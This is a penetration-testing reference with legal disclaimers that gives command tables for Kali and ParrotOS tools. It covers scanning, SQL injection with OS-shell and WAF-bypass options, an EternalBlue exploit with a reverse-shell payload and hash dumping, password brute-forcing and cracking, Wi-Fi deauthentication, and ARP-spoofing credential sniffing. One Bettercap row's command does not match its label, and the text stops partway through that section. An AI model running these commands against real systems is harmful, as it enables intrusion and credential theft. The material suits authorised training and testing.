Secure In Security — Penetration Testing Tools Reference: Kali Linux & ParrotOS
2026
Penetration Testing Tools
Kali Linux & ParrotOS
⚠ Legal Disclaimer
All tools, techniques, and commands described in this document are intended exclusively for use on systems for which explicit written authorization has been obtained. Unauthorized penetration testing or hacking is illegal under the Computer Fraud and Abuse Act (CFAA), the UK Computer Misuse Act, and equivalent legislation worldwide. Always obtain written permission before conducting any security assessment.
Introduction
Penetration testing — or ethical hacking — is a structured, authorized simulation of real-world cyberattacks conducted to identify and remediate security vulnerabilities before malicious actors can exploit them. Two Linux distributions dominate the penetration testing landscape: Kali Linux and ParrotOS.
1.1 Kali Linux
Kali Linux, maintained by Offensive Security, is a Debian-based distribution purpose-built for penetration testing, digital forensics, and reverse engineering. Its rolling-release model ensures tools are continuously updated. The April 2026 release (Kali 2026.1) introduced LLM-driven command workflows alongside 600+ pre-installed security tools.
1.2 ParrotOS
ParrotOS (Parrot Security Edition), maintained by the Parrot Project, is a Debian-based distribution targeting penetration testers, digital forensics investigators, and privacy-conscious users. Compared to Kali, ParrotOS is lighter-weight, ships with additional anonymity tools (AnonSurf, Tor integration), and is well-suited for older hardware or resource-constrained environments.
1.3 Document Scope
This document covers the most widely used penetration testing tools across both platforms, organized by testing phase. For each tool, you will find a description, platform availability, installation instructions (where needed), and a complete set of step-by-step procedural commands.
Note — Virtual Machines
Both distributions are best run in a VM (VirtualBox, VMware) during learning. Isolate your testing environment from production networks. Always snapshot your VM before major tests.
Penetration Testing Methodology
A structured penetration test follows five phases recognized by PTES (Penetration Testing Execution Standard) and OWASP:
| Phase | Name | Description |
|---|---|---|
| 1 | Reconnaissance | Passive and active information gathering about the target. No system interaction that could trigger alerts. |
| 2 | Scanning & Enumeration | Actively probing the target with port scanners, banner grabbers, and vulnerability scanners to map attack surface. |
| 3 | Exploitation | Leveraging identified vulnerabilities to gain unauthorized access. Confirms exploitability and measures real-world risk. |
| 4 | Post-Exploitation | Escalating privileges, persisting access, moving laterally, and extracting sensitive data once inside the target. |
| 5 | Reporting | Documenting all findings with severity ratings, evidence, and remediation recommendations for stakeholders. |
Reconnaissance & Information Gathering Tools
Reconnaissance is the foundation of every penetration test. The tools in this section help testers map the target’s attack surface without (or before) direct interaction.
Nmap — Network Mapper
Tool
Nmap
Platform
Kali Linux / ParrotOS
Category
Recon / Scanning
Difficulty
Beginner
Nmap is the industry-standard open-source tool for network discovery and security auditing. It uses raw IP packets to determine active hosts, open ports, running services, service versions, operating systems, and more.
Installation
sudo apt update && sudo apt install nmap -y # Kali / ParrotOSStep-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Basic Host Discovery | nmap -sn 192.168.1.0/24 | Ping scan — lists live hosts without port scanning |
| 2 | TCP SYN Scan (Stealth) | sudo nmap -sS 192.168.1.100 | Half-open scan; requires root; less likely to be logged |
| 3 | Service Version Detection | sudo nmap -sV 192.168.1.100 | Probes open ports to identify service names and versions |
| 4 | OS Detection | sudo nmap -O 192.168.1.100 | TCP/IP stack fingerprinting to guess target OS |
| 5 | Full Aggressive Scan | sudo nmap -A -T4 192.168.1.100 | OS, versions, scripts, traceroute — most comprehensive |
| 6 | Scan Specific Port Range | nmap -p 1-1024 192.168.1.100 | Limits scan to ports 1 through 1024 |
| 7 | Scan Top 1000 UDP Ports | sudo nmap -sU –top-ports 1000 192.168.1.100 | UDP scanning is slow; use sparingly |
| 8 | NSE Vulnerability Scripts | nmap –script vuln 192.168.1.100 | Runs built-in vulnerability detection scripts |
| 9 | SMB Enumeration | nmap –script smb-enum-shares,smb-enum-users -p 445 192.168.1.100 | Enumerates SMB shares and user accounts |
| 10 | Save Output to File | nmap -oN output.txt -oX output.xml 192.168.1.100 | Saves results in normal and XML formats |
Key Flags Reference
| Flag / Option | Description |
|---|---|
| -sS | TCP SYN (stealth) scan — sends SYN, does not complete handshake |
| -sV | Probe open ports to determine service/version info |
| -O | Enable OS detection via TCP/IP fingerprinting |
| -A | Aggressive: enable OS detection, version detection, script scanning, traceroute |
| -T0 to -T5 | Timing template: T0=paranoid (slowest/stealthiest), T5=insane (fastest/noisiest) |
| -p- | Scan all 65535 TCP ports |
| -Pn | Skip host discovery — treat all hosts as online (bypasses firewall blocking ICMP) |
| –script | Run one or more NSE (Nmap Scripting Engine) scripts against target |
| -oN / -oX / -oG | Output formats: Normal text, XML, Grepable |
theHarvester — OSINT Email & Domain Recon
Tool
theHarvester
Platform
Kali Linux / ParrotOS
Category
OSINT / Recon
Difficulty
Beginner
theHarvester is a passive reconnaissance tool that aggregates open-source intelligence (OSINT) from multiple public sources including search engines, DNS, PGP key servers, and SHODAN to gather email addresses, subdomains, IPs, and employee names associated with a domain.
Installation
sudo apt install theharvester -yStep-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Basic Domain Harvest | theHarvester -d example.com -b google | Query Google for emails/subdomains of example.com |
| 2 | Multi-Source Search | theHarvester -d example.com -b google,bing,yahoo,duckduckgo | Query multiple search engines simultaneously |
| 3 | DNS Brute Force | theHarvester -d example.com -b google -c | -c enables DNS brute-force for subdomains |
| 4 | Limit Results | theHarvester -d example.com -b bing -l 300 | -l limits number of results returned |
| 5 | Include Shodan Integration | theHarvester -d example.com -b shodan -k <API_KEY> | Requires a Shodan API key |
| 6 | Save to HTML/XML | theHarvester -d example.com -b all -f harvest_output | Creates harvest_output.html and .xml report files |
| 7 | Full Source Search | theHarvester -d example.com -b all | Queries all available sources (may be slow) |
Recon-ng — Web Reconnaissance Framework
Tool
Recon-ng
Platform
Kali Linux / ParrotOS
Category
OSINT Framework
Difficulty
Intermediate
Recon-ng is a full-featured web reconnaissance framework written in Python. It provides an interactive console environment where modules can be loaded to harvest OSINT data from dozens of third-party APIs (Shodan, HaveIBeenPwned, VirusTotal, etc.). Results are stored in a local SQLite workspace database.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch recon-ng | recon-ng | Opens the interactive console (similar to Metasploit) |
| 2 | Create a workspace | workspaces create target_corp | Isolates data for each engagement |
| 3 | Install modules | marketplace install all | Downloads all available modules from the marketplace |
| 4 | Load a module | modules load recon/domains-hosts/hackertarget | Loads the hackertarget subdomain discovery module |
| 5 | Set target domain | options set SOURCE example.com | Sets the domain to investigate |
| 6 | Run the module | run | Executes the loaded module; results stored in DB |
| 7 | View results | show hosts | Displays all discovered hosts in the workspace |
| 8 | Export report | modules load reporting/html options set FILENAME /tmp/recon_report.html run | Generates an HTML report from workspace data |
Maltego — Link Analysis and OSINT Visualization
Tool
Maltego
Platform
Kali Linux / ParrotOS
Category
OSINT / Graph Analysis
Difficulty
Intermediate
Maltego is a graphical OSINT and link-analysis tool that visualizes relationships between people, organizations, websites, domains, IP addresses, and social media accounts. It uses ‘Transforms’ — API calls to third-party data sources — to expand nodes in an interactive graph.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch Maltego | maltego | Opens the GUI application; requires free registration |
| 2 | Create a new graph | File > New Graph (Ctrl+T) | Each graph represents one investigation |
| 3 | Add a Domain entity | Drag ‘Domain’ entity onto canvas Set value to ‘example.com’ | Entities are the starting nodes of an investigation |
| 4 | Run DNS Transforms | Right-click entity > Run Transform > ‘DNS from Domain — MX’ | Discovers mail servers for the domain |
| 5 | Expand to IP addresses | Right-click domain > ‘Resolve to IP’ > Run All Transforms | Enumerates all A/CNAME records |
| 6 | Discover subdomains | Right-click domain > ‘DomainToDNSNameScheme’ | Brute-forces common subdomain names |
| 7 | Person/email pivot | Right-click email entity > ‘Email to Person’ | Links email addresses to possible identities |
| 8 | Export graph | File > Export Graph > PNG/PDF | Used for pentest report evidence |
Vulnerability Scanning Tools
Nikto — Web Server Vulnerability Scanner
Tool
Nikto
Platform
Kali Linux / ParrotOS
Category
Web App Scanning
Difficulty
Beginner
Nikto is an open-source web server scanner that performs comprehensive tests against web servers, checking for over 6,700 potentially dangerous files/programs, outdated server versions, server configuration problems, and security misconfigurations.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Basic Scan | nikto -h http://192.168.1.100 | Scans web server on port 80 |
| 2 | Scan HTTPS Target | nikto -h https://192.168.1.100 -ssl | Forces SSL/TLS scan |
| 3 | Specify Port | nikto -h 192.168.1.100 -p 8080 | Scan on non-standard port |
| 4 | Scan with Authentication | nikto -h http://192.168.1.100 -id admin:password | Basic auth credentials in user:pass format |
| 5 | Scan via Proxy | nikto -h http://192.168.1.100 -useproxy http://127.0.0.1:8080 | Routes traffic through Burp Suite for logging |
| 6 | Tune Output (hide non-vulns) | nikto -h http://192.168.1.100 -Tuning x | x = exclude info messages; show only vulnerabilities |
| 7 | Save Output | nikto -h http://192.168.1.100 -o nikto_report.html -Format html | Saves formatted HTML report |
| 8 | Multiple Hosts from File | nikto -h targets.txt | targets.txt: one host per line |
OpenVAS / Greenbone — Network Vulnerability Scanner
Tool
OpenVAS / GVM
Platform
Kali Linux / ParrotOS
Category
Vulnerability Management
Difficulty
Intermediate
OpenVAS (Open Vulnerability Assessment System), now part of the Greenbone Vulnerability Management (GVM) suite, is a full-featured vulnerability scanner with a web-based interface. It maintains a regularly updated feed of over 80,000 Network Vulnerability Tests (NVTs).
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install GVM | sudo apt install gvm -y | Installs the full Greenbone/OpenVAS suite |
| 2 | Initialize GVM | sudo gvm-setup | Downloads NVT feeds; may take 15–30 min on first run |
| 3 | Verify Setup | sudo gvm-check-setup | Confirms all services are running correctly |
| 4 | Start GVM Services | sudo gvm-start | Starts ospd-openvas, gvmd, and gsad services |
| 5 | Access Web Interface | Browser: https://127.0.0.1:9392 | Default credentials set during gvm-setup |
| 6 | Create Scan Target | Scans > Targets > New Target Name: Lab-Target Hosts: 192.168.1.100 | Define what will be scanned |
| 7 | Create Scan Task | Scans > Tasks > New Task Scan Config: Full and Fast Target: Lab-Target | ‘Full and Fast’ is recommended for most tests |
| 8 | Launch Scan | Click ‘Start’ (play button) on the task | Progress shown as percentage in task list |
| 9 | Review Results | Scans > Reports > Select Report Filter by Severity: High, Critical | CVE IDs and CVSS scores displayed per finding |
| 10 | Export Report | Report > Download > PDF/XML/CSV | Use PDF for executive reports, XML for tool import |
Lynis — Linux System Auditing Tool
Tool
Lynis
Platform
Kali Linux / ParrotOS
Category
Host Hardening Audit
Difficulty
Beginner
Lynis is an open-source security auditing tool designed for Unix/Linux systems. Unlike network scanners, Lynis audits the local host: checking file permissions, installed packages, authentication configuration, kernel parameters, and compliance against CIS benchmarks.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Lynis | sudo apt install lynis -y | Available in default repos on both platforms |
| 2 | Full System Audit | sudo lynis audit system | Runs all security tests; takes 3–10 min |
| 3 | Non-interactive Mode | sudo lynis audit system –quick | Skips prompts; good for automated runs |
| 4 | Test Specific Category | sudo lynis audit system –tests-from-group firewall | Only runs firewall-related checks |
| 5 | View Report | cat /var/log/lynis-report.dat | Machine-readable report for post-processing |
| 6 | View Log | cat /var/log/lynis.log | Human-readable detailed log of all tests |
| 7 | Pentest Profile Mode | sudo lynis audit system –profile /etc/lynis/default.prf | Use custom profile for targeted compliance checks |
Exploitation Tools
Metasploit Framework — Exploitation Platform
Tool
Metasploit Framework
Platform
Kali Linux / ParrotOS
Category
Exploitation Framework
Difficulty
Intermediate
Metasploit is the world’s most widely used penetration testing framework. It provides an extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools within a unified console interface (msfconsole). Its modular architecture allows testers to quickly combine exploit code with payloads to compromise target systems.
Core Workflow — Exploiting a Vulnerable Service
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Start Metasploit Console | msfconsole | Opens the MSF interactive shell; startup takes ~20s |
| 2 | Search for an Exploit | search eternalblue search type:exploit name:smb | Searches module library by keyword, type, or name |
| 3 | Load Exploit Module | use exploit/windows/smb/ms17_010_eternalblue | Selects the EternalBlue SMB exploit (MS17-010) |
| 4 | View Required Options | show options | Lists REQUIRED and optional configuration parameters |
| 5 | Set Target Host | set RHOSTS 192.168.1.105 | RHOSTS = remote/target host IP or range |
| 6 | Set Local Host | set LHOST 192.168.1.10 | LHOST = your machine’s IP (for reverse shell) |
| 7 | Select Payload | set PAYLOAD windows/x64/meterpreter/reverse_tcp | Meterpreter = advanced in-memory payload |
| 8 | Run the Exploit | exploit (or run) | Launches the exploit; successful = Meterpreter session |
| 9 | Meterpreter — System Info | sysinfo | Displays OS, hostname, architecture of compromised host |
| 10 | Meterpreter — Shell | shell | Drops into a native OS command shell |
| 11 | Meterpreter — Screenshot | screenshot | Captures screenshot from target desktop |
| 12 | Meterpreter — Download File | download C:\\Users\\Admin\\secret.txt /tmp/ | Exfiltrates a file to attacker machine |
| 13 | Privilege Escalation | getsystem | Attempts automatic privilege escalation to SYSTEM |
| 14 | Dump Password Hashes | hashdump | Extracts SAM database password hashes |
| 15 | Background Session | background sessions -l sessions -i 1 | Background and resume sessions; -i resumes session 1 |
Auxiliary Module — Port Scanning with Metasploit
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Load TCP Scanner | use auxiliary/scanner/portscan/tcp | Metasploit’s built-in TCP port scanner |
| 2 | Set target range | set RHOSTS 192.168.1.0/24 set PORTS 21,22,23,80,443,445,3389 | Scan entire subnet for specific ports |
| 3 | Run scanner | run | Results stored in msfdb and displayed in console |
Warning
Run Metasploit only on systems you own or have explicit written authorization to test. EternalBlue exploits against live systems without authorization is a federal crime.
SQLMap — Automated SQL Injection
Tool
SQLMap
Platform
Kali Linux / ParrotOS
Category
Web App / SQL Injection
Difficulty
Intermediate
SQLMap is an open-source tool that automates the detection and exploitation of SQL injection flaws in web applications. It supports all major database engines (MySQL, MSSQL, PostgreSQL, Oracle, SQLite, etc.) and can extract databases, tables, credentials, and execute OS commands through the injection point.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Detect SQL Injection in URL | sqlmap -u “http://target.com/page?id=1” | Tests the ‘id’ parameter for SQLi vulnerability |
| 2 | List All Databases | sqlmap -u “http://target.com/page?id=1” –dbs | Enumerates accessible database names |
| 3 | List Tables in DB | sqlmap -u “http://target.com/page?id=1” -D webapp –tables | Lists all tables in the ‘webapp’ database |
| 4 | Dump Table Contents | sqlmap -u “http://target.com/page?id=1” -D webapp -T users –dump | Extracts all rows from the ‘users’ table |
| 5 | Specify Injection Technique | sqlmap -u “http://target.com/page?id=1” –technique=BEUST | B=Boolean, E=Error, U=Union, S=Stacked, T=Time |
| 6 | Test POST Request | sqlmap -u “http://target.com/login” –data=”user=admin&pass=test” -p user | -p specifies which parameter to test; –data for POST |
| 7 | Use Intercepted Request | sqlmap -r request.txt | request.txt: raw HTTP request saved from Burp Suite |
| 8 | Bypass WAF with Tamper | sqlmap -u “http://target.com/?id=1” –tamper=space2comment | Tamper scripts obfuscate payloads to bypass WAFs |
| 9 | OS Command Execution | sqlmap -u “http://target.com/?id=1” –os-shell | Attempts to spawn interactive OS shell via SQL injection |
| 10 | Set Risk and Level | sqlmap -u “http://target.com/?id=1” –level=5 –risk=3 | Higher levels = more tests; risk 3 = destructive tests (use with care) |
Password Attack Tools
Hashcat — GPU-Accelerated Password Cracker
Tool
Hashcat
Platform
Kali Linux / ParrotOS
Category
Password Cracking
Difficulty
Intermediate
Hashcat is the world’s fastest password recovery utility. It leverages GPU parallelism to crack hashed passwords using dictionary attacks, brute-force, rule-based, and hybrid attacks. It supports over 350 hash types including MD5, SHA-1, SHA-256, NTLM, bcrypt, WPA-PMKID, and more.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Identify Hash Type | hashcat –identify hash.txt — OR — hashid -m ‘5f4dcc3b5aa765d61d8327deb882cf99’ | Always confirm hash type before cracking |
| 2 | Dictionary Attack (MD5) | hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt | -m 0 = MD5; -a 0 = dictionary; rockyou.txt = wordlist |
| 3 | NTLM Hash Crack | hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt | -m 1000 = NTLM; common in Windows AD environments |
| 4 | WPA2 WiFi Handshake | hashcat -m 2500 -a 0 handshake.hccapx /usr/share/wordlists/rockyou.txt | -m 2500 = WPA-EAPOL; requires captured 4-way handshake |
| 5 | Brute-Force Attack | hashcat -m 0 -a 3 hash.txt ?u?l?l?l?d?d?d?d | ?u=uppercase, ?l=lowercase, ?d=digit; masks define charset |
| 6 | Rule-Based Attack | hashcat -m 0 -a 0 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule | Applies mutation rules to each wordlist entry |
| 7 | Show Cracked Passwords | hashcat -m 0 hashes.txt –show | Displays previously cracked passwords from potfile |
| 8 | Resume Interrupted Session | hashcat –session mysession –restore | Sessions can be saved and resumed later |
Common Hash Mode Reference (-m values)
| Flag / Option | Description |
|---|---|
| -m 0 | MD5 |
| -m 100 | SHA-1 |
| -m 1400 | SHA-256 |
| -m 1000 | NTLM (Windows passwords) |
| -m 1800 | SHA-512 crypt (Linux /etc/shadow) |
| -m 3200 | bcrypt (web application passwords) |
| -m 2500 | WPA/WPA2 EAPOL (Wi-Fi handshake) |
| -m 13100 | Kerberos TGS-REP (Kerberoasting) |
Hydra — Online Password Brute-Forcer
Tool
Hydra
Platform
Kali Linux / ParrotOS
Category
Online Password Attack
Difficulty
Beginner
Hydra is a fast, parallelized online login cracker supporting over 50 protocols including FTP, SSH, Telnet, HTTP, HTTPS, SMB, LDAP, SMTP, MySQL, and RDP. It performs dictionary or brute-force attacks against live authentication services.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | SSH Brute-Force | hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 | -l = single username; -P = password list file |
| 2 | SSH with User List | hydra -L users.txt -P passwords.txt ssh://192.168.1.100 | -L = username list; -P = password list |
| 3 | FTP Brute-Force | hydra -l ftp_user -P rockyou.txt ftp://192.168.1.100 | Standard FTP login brute-force |
| 4 | HTTP POST Form | hydra -l admin -P rockyou.txt 192.168.1.100 http-post-form “/login:user=^USER^&pass=^PASS^:Invalid credentials” | Replace field names and failure string for target form |
| 5 | RDP Brute-Force | hydra -l Administrator -P rockyou.txt rdp://192.168.1.105 | Targets Windows Remote Desktop Protocol |
| 6 | Set Parallel Tasks | hydra -l admin -P rockyou.txt -t 16 ssh://192.168.1.100 | -t = threads per target; default is 16 |
| 7 | Add Delay Between Attempts | hydra -l admin -P rockyou.txt -w 3 ssh://192.168.1.100 | -w = wait time in seconds (avoids lockout) |
| 8 | Save Valid Credentials | hydra -l admin -P rockyou.txt -o creds.txt ssh://192.168.1.100 | -o saves found credentials to file |
John the Ripper — Password Hash Cracker
Tool
John the Ripper
Platform
Kali Linux / ParrotOS
Category
Password Cracking
Difficulty
Beginner
John the Ripper (JtR) is a versatile, CPU-based password cracker designed for offline hash cracking and Linux /etc/shadow files. The community ‘Jumbo’ edition supports over 400 hash types and includes specialized tools (ssh2john, zip2john, etc.) to extract hashes from file formats.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Crack /etc/shadow (Linux) | sudo unshadow /etc/passwd /etc/shadow > combined.txt john combined.txt | unshadow merges passwd and shadow for John to process |
| 2 | Dictionary Attack | john –wordlist=/usr/share/wordlists/rockyou.txt hashes.txt | Standard wordlist-based crack |
| 3 | Crack SSH Private Key | ssh2john id_rsa > id_rsa_hash.txt john id_rsa_hash.txt –wordlist=rockyou.txt | ssh2john extracts crackable hash from passphrase-protected key |
| 4 | Crack ZIP Archive Password | zip2john protected.zip > zip_hash.txt john zip_hash.txt –wordlist=rockyou.txt | zip2john extracts hash from encrypted ZIP file |
| 5 | Show Cracked Passwords | john –show hashes.txt | Displays cracked passwords from session |
| 6 | Specify Hash Format | john –format=NT hashes.txt –wordlist=rockyou.txt | Explicitly specify hash type if auto-detect fails |
| 7 | Apply Mangling Rules | john hashes.txt –wordlist=rockyou.txt –rules=Jumbo | Jumbo rule set applies extensive word mutations |
Web Application Testing Tools
Burp Suite Community Edition — Web App Proxy
Tool
Burp Suite
Platform
Kali Linux / ParrotOS
Category
Web App / Proxy
Difficulty
Intermediate
Burp Suite is the industry-standard toolkit for web application security testing. Its intercepting proxy sits between the browser and target web server, enabling testers to inspect, modify, and replay HTTP/S requests. Key modules include Proxy, Repeater, Intruder, Scanner, Decoder, and Sequencer.
Step-by-Step Procedures — Core Workflow
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch Burp Suite | burpsuite | Opens Burp Suite GUI; choose Temporary Project |
| 2 | Configure Browser Proxy | Browser > Settings > Manual Proxy: HTTP Proxy: 127.0.0.1 Port: 8080 | All HTTP/S traffic now routes through Burp |
| 3 | Install Burp CA Certificate | Browser: navigate to http://burpsuite Download CA Cert > Import into Browser Trust Store | Required to intercept HTTPS without cert errors |
| 4 | Enable Intercept | Proxy tab > Intercept > ‘Intercept is on’ | Burp will hold each request until forwarded/dropped |
| 5 | Browse the Target App | Navigate target app in browser | All requests appear in HTTP History for review |
| 6 | Send Request to Repeater | HTTP History > Right-click request > ‘Send to Repeater’ | Repeater lets you modify and replay individual requests |
| 7 | Modify and Replay Request | Repeater tab > Edit params in request panel > ‘Send’ | Used to manually test for SQLi, XSS, auth bypass, etc. |
| 8 | Send to Intruder (Fuzzing) | Right-click request > ‘Send to Intruder’ Intruder > Positions > Highlight param > ‘Add §’ | Intruder automates fuzzing a parameter with a payload list |
| 9 | Run Intruder Attack | Intruder > Payloads > Load wordlist file Attack > Start Attack | Results show status codes; look for 200 vs 401/302 |
| 10 | Decode/Encode Data | Decoder tab > Paste value > Select encoding type > Decode/Encode | Supports Base64, URL, HTML, Hex, Gzip encodings |
OWASP ZAP — Open-Source Web App Scanner
Tool
OWASP ZAP
Platform
Kali Linux / ParrotOS
Category
Web App Scanner / Proxy
Difficulty
Beginner
OWASP ZAP (Zed Attack Proxy) is a free, open-source web application security scanner. Unlike Burp Suite Community, ZAP includes a built-in automated scanner and is scriptable via Python/JavaScript for CI/CD pipeline integration.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch ZAP | zaproxy | Opens ZAP GUI; select ‘Automated Scan’ for quick start |
| 2 | Spider the Target | Quick Start > URL to attack: http://target.com > Attack | Spider crawls all links; Active Scan probes for vulnerabilities |
| 3 | Manual Proxy Browse | Set browser proxy: 127.0.0.1:8080 Browse target app | ZAP captures all requests in Sites tree |
| 4 | Active Scan a Node | Sites tree > Right-click target > Attack > Active Scan | Automated scanning of the target with probe requests |
| 5 | View Alerts | Alerts tab > Filter by Risk: High/Medium | ZAP categorizes findings by risk level with CWE references |
| 6 | Forced Browse (DirBuster) | Tools > Forced Browse Site Select fuzz list > Start | Discovers hidden paths and files on web server |
| 7 | Generate HTML Report | Report > Generate HTML Report > Save | Includes all alerts, descriptions, and solution guidance |
| 8 | Run in CLI Mode (CI/CD) | zap.sh -cmd -quickurl http://target.com -quickprogress -quickout report.html | Headless automated scan for DevSecOps pipelines |
Dirb & Gobuster — Web Content Discovery
Tool
Dirb / Gobuster
Platform
Kali Linux / ParrotOS
Category
Web Enumeration
Difficulty
Beginner
Dirb and Gobuster are wordlist-based web content scanners that brute-force URIs (directories and files) on a web server to discover hidden content such as admin panels, backup files, configuration files, and API endpoints not linked from the main site.
Dirb Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Basic Directory Scan | dirb http://192.168.1.100/ | Uses default wordlist (/usr/share/dirb/wordlists/common.txt) |
| 2 | Custom Wordlist | dirb http://192.168.1.100/ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | Larger lists find more but take longer |
| 3 | Scan Specific Extensions | dirb http://192.168.1.100/ -X .php,.txt,.bak,.conf | Appends extensions to each wordlist entry |
| 4 | Save Output | dirb http://192.168.1.100/ -o dirb_output.txt | Saves discovered URLs to file |
Gobuster Procedures (Faster Alternative)
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Gobuster | sudo apt install gobuster -y | Pre-installed on most Kali/Parrot versions |
| 2 | Directory Brute-Force | gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | ‘dir’ mode; -u = URL; -w = wordlist |
| 3 | With File Extensions | gobuster dir -u http://192.168.1.100 -w common.txt -x php,html,txt,bak | -x appends comma-separated extensions |
| 4 | DNS Subdomain Fuzzing | gobuster dns -d example.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | ‘dns’ mode discovers subdomains; requires SecLists |
| 5 | Virtual Host Fuzzing | gobuster vhost -u http://example.com -w subdomains.txt | ‘vhost’ mode brute-forces virtual host names |
| 6 | Set Threads and Timeout | gobuster dir -u http://target.com -w wordlist.txt -t 50 –timeout 15s | -t = threads (default 10); higher = faster but noisier |
Wireless Attack Tools
Legal Note
Wireless testing requires written authorization from the owner of the access point being tested. Unauthorized interception of wireless communications is illegal under the Electronic Communications Privacy Act and equivalent laws worldwide.
Aircrack-ng Suite — Wi-Fi Security Auditing
Tool
Aircrack-ng
Platform
Kali Linux / ParrotOS
Category
Wireless Security
Difficulty
Intermediate
The Aircrack-ng suite is a complete set of tools for 802.11 wireless network auditing. It includes: airmon-ng (enable monitor mode), airodump-ng (capture packets), aireplay-ng (inject packets and deauthenticate clients), and aircrack-ng (crack WEP/WPA-PSK keys from captured handshakes).
WPA2 4-Way Handshake Capture & Crack Procedure
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Identify Wireless Interface | iwconfig — OR — ip link show | Note your interface name (e.g., wlan0) |
| 2 | Kill Interfering Processes | sudo airmon-ng check kill | Stops NetworkManager and wpa_supplicant |
| 3 | Enable Monitor Mode | sudo airmon-ng start wlan0 | Creates monitor interface (wlan0mon) |
| 4 | Scan for Networks | sudo airodump-ng wlan0mon | Lists all visible APs with BSSID, channel, SSID |
| 5 | Target Specific AP | sudo airodump-ng -c 6 –bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon | -c = channel; –bssid = AP MAC; -w = output file prefix |
| 6 | Deauthenticate Client | sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon | -0 5 = send 5 deauth frames; forces client to re-authenticate |
| 7 | Verify Handshake Captured | — Look for ‘WPA handshake’ message in airodump-ng output — | Handshake captured in capture-01.cap file |
| 8 | Crack with Aircrack-ng | aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap | -w = wordlist; -b = AP BSSID |
| 9 | Crack with Hashcat (GPU) | hcxpcapngtool capture-01.cap -o handshake.hc22000 hashcat -m 22000 handshake.hc22000 rockyou.txt | Convert to hashcat format first for GPU acceleration |
| 10 | Restore Interface | sudo airmon-ng stop wlan0mon sudo systemctl start NetworkManager | Returns interface to managed mode after testing |
Network Sniffing & MITM Tools
Wireshark — Packet Analyzer
Tool
Wireshark
Platform
Kali Linux / ParrotOS
Category
Network Analysis
Difficulty
Beginner
Wireshark is the world’s foremost network protocol analyzer. It captures packets in real time from network interfaces and displays them with deep protocol dissection. Used for analyzing network traffic, detecting anomalies, capturing credentials on unencrypted protocols (FTP, Telnet, HTTP), and troubleshooting network issues.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch Wireshark | wireshark — OR (CLI) — tshark -i eth0 | GUI version; tshark is the CLI equivalent |
| 2 | Start Packet Capture | GUI: Double-click network interface (e.g., eth0) | Live packets begin streaming immediately |
| 3 | Capture to File | tshark -i eth0 -w capture.pcap | Saves packets to PCAP file for offline analysis |
| 4 | Filter by Protocol | Filter bar: http — OR — Filter bar: tcp.port == 443 | Display filter (not capture filter); applied post-capture |
| 5 | Follow TCP Stream | Right-click packet > ‘Follow’ > ‘TCP Stream’ | Reconstructs full TCP conversation in readable format |
| 6 | Filter HTTP Credentials | http.request.method == POST | Shows POST requests; inspect body for cleartext passwords |
| 7 | Extract Files from Capture | File > Export Objects > HTTP Select files to export | Reconstructs files (images, executables) from HTTP traffic |
| 8 | Capture Only Specific Host | tshark -i eth0 -f “host 192.168.1.100” -w target.pcap | -f = BPF capture filter (applied before capture) |
| 9 | Analyze with tshark | tshark -r capture.pcap -Y ‘ftp contains password’ -T fields -e ftp.request.arg | Extract FTP password field from saved capture |
Bettercap — Network MITM Framework
Tool
Bettercap
Platform
Kali Linux / ParrotOS
Category
MITM / Network Attack
Difficulty
Advanced
Bettercap is a powerful, extensible man-in-the-middle framework for network reconnaissance, ARP/DNS/HTTPS spoofing, credential sniffing, and BLE/Wi-Fi attacks. It replaces the older Ettercap tool with a modular, script-driven architecture and a built-in web UI.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Bettercap | sudo apt install bettercap -y sudo bettercap -eval “caplets.update; ui.update; q” | Updates caplets and web UI on first run |
| 2 | Launch Bettercap | sudo bettercap -iface eth0 | Specify your active network interface |
| 3 | Discover Network Hosts | net.probe on net.show | Probes network; net.show lists all discovered hosts |
| 4 | Enable ARP Spoofing | set arp.spoof.targets 192.168.1.50 arp.spoof on | Poisons ARP cache; victim’s traffic routes through attacker |
| 5 | Enable IP Forwarding | set net.sniff.verbose true net.sniff on | Without IP forwarding, victim loses internet connectivity |
| 6 | Sniff Credentials | net.sniff on | Captures credentials from HTTP, FTP, Telnet, POP3, IMAP, etc. |
